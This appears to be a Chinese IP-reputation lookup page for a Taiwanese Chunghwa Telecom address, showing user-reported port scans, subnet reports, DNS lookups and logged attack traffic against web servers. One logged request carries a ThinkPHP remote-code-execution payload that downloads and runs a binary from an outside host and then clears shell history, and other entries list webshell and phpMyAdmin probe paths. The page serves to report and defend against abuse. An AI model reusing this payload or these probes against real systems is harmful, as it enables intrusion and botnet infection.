必须是合法有效的IP地址, 可以是IPv4或者是IPv6, 例如127.0.0.1或者2001:DB8:0:0:8:800:200C:417A
基本信息:

城市(city): unknown

省份(region): unknown

国家(country): Republic of China (ROC)

运营商(isp): Chunghwa Telecom Co. Ltd.

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:
类型 评论内容 时间
attackspam
 TCP (SYN) 122.117.16.189:49222 -> port 23, len 44
2020-09-13 02:11:50
attack
 TCP (SYN) 122.117.16.189:49222 -> port 23, len 44
2020-09-12 18:12:26
相同子网IP讨论:
IP 类型 评论内容 时间
122.117.164.89 attackbotsspam
Unauthorized connection attempt detected from IP address 122.117.164.89 to port 85
2020-07-28 18:56:21
122.117.169.212 attack
Auto Detect Rule!
proto TCP (SYN), 122.117.169.212:36499->gjan.info:23, len 40
2020-07-10 18:42:00
122.117.165.37 attack
port scan and connect, tcp 80 (http)
2020-06-19 05:16:25
122.117.16.182 attackbots
port
2020-03-24 03:07:09
122.117.166.13 attack
Unauthorized connection attempt detected from IP address 122.117.166.13 to port 23 [J]
2020-03-02 23:00:54
122.117.166.13 attackbotsspam
Feb 26 22:50:09 debian-2gb-nbg1-2 kernel: \[5013004.367208\] \[UFW BLOCK\] IN=eth0 OUT= MAC=96:00:00:0e:18:f4:d2:74:7f:6e:37:e3:08:00 SRC=122.117.166.13 DST=195.201.40.59 LEN=40 TOS=0x00 PREC=0x00 TTL=243 ID=16332 DF PROTO=TCP SPT=11118 DPT=81 WINDOW=14600 RES=0x00 SYN URGP=0
2020-02-27 06:48:53
122.117.16.12 attackspam
unauthorized connection attempt
2020-02-26 21:05:19
122.117.166.242 attackspam
Unauthorized connection attempt detected from IP address 122.117.166.242 to port 23 [J]
2020-02-23 19:26:51
122.117.165.93 attackbots
Unauthorized connection attempt detected from IP address 122.117.165.93 to port 4567 [J]
2020-01-21 14:28:21
122.117.165.152 attackbots
Unauthorized connection attempt detected from IP address 122.117.165.152 to port 82 [J]
2020-01-12 15:11:40
122.117.169.34 attackspam
scan z
2019-11-25 01:29:33
122.117.164.212 attackbots
From CCTV User Interface Log
...::ffff:122.117.164.212 - - [13/Oct/2019:23:56:38 +0000] "POST /editBlackAndWhiteList HTTP/1.1" 501 188
...
2019-10-14 13:24:15
122.117.165.85 attack
Aug 15 01:36:10 h2177944 kernel: \[4149496.947769\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=122.117.165.85 DST=85.214.117.9 LEN=40 TOS=0x00 PREC=0x00 TTL=48 ID=39087 PROTO=TCP SPT=40672 DPT=23 WINDOW=31000 RES=0x00 SYN URGP=0 
Aug 15 01:37:02 h2177944 kernel: \[4149548.588997\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=122.117.165.85 DST=85.214.117.9 LEN=40 TOS=0x00 PREC=0x00 TTL=48 ID=39087 PROTO=TCP SPT=40672 DPT=23 WINDOW=31000 RES=0x00 SYN URGP=0 
Aug 15 01:37:08 h2177944 kernel: \[4149554.953853\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=122.117.165.85 DST=85.214.117.9 LEN=40 TOS=0x00 PREC=0x00 TTL=48 ID=39087 PROTO=TCP SPT=40672 DPT=23 WINDOW=31000 RES=0x00 SYN URGP=0 
Aug 15 01:37:09 h2177944 kernel: \[4149556.092931\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=122.117.165.85 DST=85.214.117.9 LEN=40 TOS=0x00 PREC=0x00 TTL=48 ID=39087 PROTO=TCP SPT=40672 DPT=23 WINDOW=31000 RES=0x00 SYN URGP=0 
Aug 15 01:37:11 h2177944 kernel: \[4149558.101987\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=122.117.165.85 DST=85.214.117.9 LE
2019-08-15 08:00:49
122.117.162.61 attackspambots
POST /cgi-bin/ViewLog.asp
23&remoteSubmit=Save
2019-08-07 05:19:10
WHOIS信息:
b
DIG信息:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 122.117.16.189
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 45030
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;122.117.16.189.			IN	A

;; AUTHORITY SECTION:
.			535	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2020091200 1800 900 604800 86400

;; Query time: 122 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sat Sep 12 18:12:19 CST 2020
;; MSG SIZE  rcvd: 118
HOST信息:
189.16.117.122.in-addr.arpa domain name pointer 122-117-16-189.HINET-IP.hinet.net.
NSLOOKUP信息:
Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
189.16.117.122.in-addr.arpa	name = 122-117-16-189.HINET-IP.hinet.net.

Authoritative answers can be found from:
相关IP信息:
最新评论:
IP 类型 评论内容 时间
101.226.114.193 attack
101.226.114.193 - - [13/Apr/2019:13:01:15 +0800] "GET /zuos.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
101.226.114.193 - - [13/Apr/2019:13:01:15 +0800] "GET /zuos.php HTTP/1.1" 404 209 "http://118.25.52.138/zuos.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
101.227.151.57 - - [13/Apr/2019:13:01:16 +0800] "GET /MCLi.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
101.227.151.57 - - [13/Apr/2019:13:01:16 +0800] "GET /MCLi.php HTTP/1.1" 404 209 "http://118.25.52.138/MCLi.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
2019-04-13 13:01:46
101.226.102.70 attack
101.226.102.70 - - [12/Apr/2019:06:27:56 +0800] "GET /plus/90sec.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
101.226.102.70 - - [12/Apr/2019:06:27:56 +0800] "GET /plus/90sec.php HTTP/1.1" 404 209 "http://ipinfo.asytech.cn/plus/90sec.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
2019-04-12 07:07:38
120.92.90.154 botsattack
120.92.90.154 - - [17/Apr/2019:00:04:34 +0000] "POST /public/index.php HTTP/1.1" 404 15604 "-" "python-requests/2.21.0"
120.92.90.154 - - [17/Apr/2019:00:04:35 +0000] "GET /public/gqxuracc.php HTTP/1.1" 404 15604 "-" "python-requests/2.21.0"
120.92.90.154 - - [17/Apr/2019:00:04:35 +0000] "POST /public/index.php HTTP/1.1" 404 15604 "-" "python-requests/2.21.0"
120.92.90.154 - - [17/Apr/2019:00:04:35 +0000] "GET /public/gqxuracc.php HTTP/1.1" 404 15604 "-" "python-requests/2.21.0"
2019-04-17 08:12:27
113.4.133.2 attack
攻击 端口扫描
2019-04-15 14:29:58
185.255.46.177 attack
185.255.46.177 - - [13/Apr/2019:09:00:42 +0800] "POST //xmlrpc.php HTTP/1.1" 200 4434 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
185.255.46.177 - - [13/Apr/2019:09:00:43 +0800] "POST //xmlrpc.php HTTP/1.1" 200 4434 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
2019-04-13 09:18:09
101.226.102.70 attack
101.226.102.70 - - [10/Apr/2019:15:01:18 +0800] "GET //moon.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
101.226.102.70 - - [10/Apr/2019:15:01:18 +0800] "GET //moon.php HTTP/1.1" 308 257 "http://ipinfo.asytech.cn//moon.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
101.226.102.70 - - [10/Apr/2019:15:01:18 +0800] "GET / HTTP/1.1" 301 194 "https://ipinfo.asytech.cn//moon.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
101.226.102.70 - - [10/Apr/2019:15:01:18 +0800] "GET / HTTP/1.1" 200 3272 "http://ipinfo.asytech.cn/" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
2019-04-10 15:03:48
123.249.7.34 attack
123.249.7.34 - - [12/Apr/2019:02:27:37 +0800] "POST /uploads/dede/sys_verifies.php?action=down HTTP/1.1" 301 194 "http://ipinfo.asytech.cn/uploads/dede/sys_verifies.php?action=down" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
123.249.7.34 - - [12/Apr/2019:02:27:37 +0800] "POST /index.php/api/Uploadify/preview HTTP/1.1" 301 194 "http://ipinfo.asytech.cn/index.php/api/Uploadify/preview" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
2019-04-12 06:28:14
46.248.167.73 bots
46.248.167.73 - - [13/Apr/2019:10:17:45 +0800] "GET /index.php/category/root/amazon/ HTTP/1.1" 200 21893 "-" "Zend_Http_Client"
2019-04-13 10:18:13
103.26.136.6 attack
103.26.136.6 - - [09/Apr/2019:22:16:02 +0800] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 301 194 "-" "ZmEu"
103.26.136.6 - - [09/Apr/2019:22:16:02 +0800] "GET  HTTP/1.1" 400 182 "-" "-"
103.26.136.6 - - [09/Apr/2019:22:16:02 +0800] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu"
103.26.136.6 - - [09/Apr/2019:22:16:02 +0800] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu"
103.26.136.6 - - [09/Apr/2019:22:16:02 +0800] "GET /myadmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu"
103.26.136.6 - - [09/Apr/2019:22:16:03 +0800] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu"
103.26.136.6 - - [09/Apr/2019:22:16:04 +0800] "GET /pma/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu"
2019-04-09 22:24:14
216.244.66.245 bots
216.244.66.245 - - [12/Apr/2019:21:10:08 +0800] "GET /robots.txt HTTP/1.1" 301 194 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
216.244.66.245 - - [12/Apr/2019:21:10:12 +0800] "GET /robots.txt HTTP/1.1" 200 292 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
2019-04-13 09:20:01
60.215.24.152 attack
伪装爬虫攻击
60.215.24.152 - - [09/Apr/2019:05:27:08 +0800] "POST ///zhanpushi.asp HTTP/1.1" 404 571 "-" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
60.215.24.152 - - [09/Apr/2019:05:27:09 +0800] "POST ///data/shitan.php HTTP/1.1" 404 573 "-" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
60.215.24.152 - - [09/Apr/2019:05:27:09 +0800] "POST ///e/news.php HTTP/1.1" 404 568 "-" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
60.215.24.152 - - [09/Apr/2019:05:27:09 +0800] "POST ///plus/e7xue.php HTTP/1.1" 404 572 "-" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
60.215.24.152 - - [09/Apr/2019:05:27:10 +0800] "POST ///aurrs.jsp HTTP/1.1" 404 567 "-" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
60.215.24.152 - - [09/Apr/2019:05:27:10 +0800] "POST ///eback/bdata/u113791a_20110421200120/config.php HTTP/1.1" 404 604 "-" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
2019-04-09 07:21:00
119.203.225.156 attack
119.203.225.156 - - [11/Apr/2019:11:38:59 +0800] "GET /check-ip/148.70.11.98 HTTP/1.1" 200 8744 "https://ipinfo.asytech.cn/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36"
119.203.225.156 - - [11/Apr/2019:11:39:00 +0800] "GET /?q=node/add HTTP/1.1" 200 3267 "https://ipinfo.asytech.cn/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36"
119.203.225.156 - - [11/Apr/2019:11:39:00 +0800] "GET /?q=user HTTP/1.1" 200 3267 "https://ipinfo.asytech.cn/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36"
2019-04-11 11:39:57
121.84.221.236 attack
121.84.221.236 - - [08/Apr/2019:19:53:14 +0800] "GET /index.php?s=/index/\\x09hink\\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.244.25.131/x86 -O .Akari; chmod +x .Akari; rm -rf .Akari x86; history -c -w;exit;logout;' HTTP/1.1" 400 182 "-" "Akari(selfrep)"
2019-04-08 19:54:18
5.188.115.64 attack
端口扫描brute-force
2019-04-16 07:05:55
180.97.35.149 bots
不是正常流量
180.97.35.149 - - [09/Apr/2019:06:37:37 +0800] "GET / HTTP/1.1" 301 194 "http://www.baidu.com/s?wd=widetme" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
180.97.35.164 - - [09/Apr/2019:06:37:38 +0800] "GET / HTTP/1.1" 200 3259 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
180.97.35.164 - - [09/Apr/2019:06:37:38 +0800] "GET /static/bootstrap/css/bootstrap.min.css HTTP/1.1" 200 144877 "https://ipinfo.asytech.cn/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
2019-04-09 06:44:15

最近上报的IP列表

206.19.205.7 159.237.11.53 232.161.129.133 180.246.203.206
30.170.126.187 40.179.188.238 77.14.147.42 58.4.96.252
15.181.66.129 5.160.82.198 78.249.223.181 33.84.246.233
118.56.113.76 25.50.221.177 146.99.20.80 140.223.155.4
223.237.150.31 109.61.68.24 177.36.212.15 152.66.103.80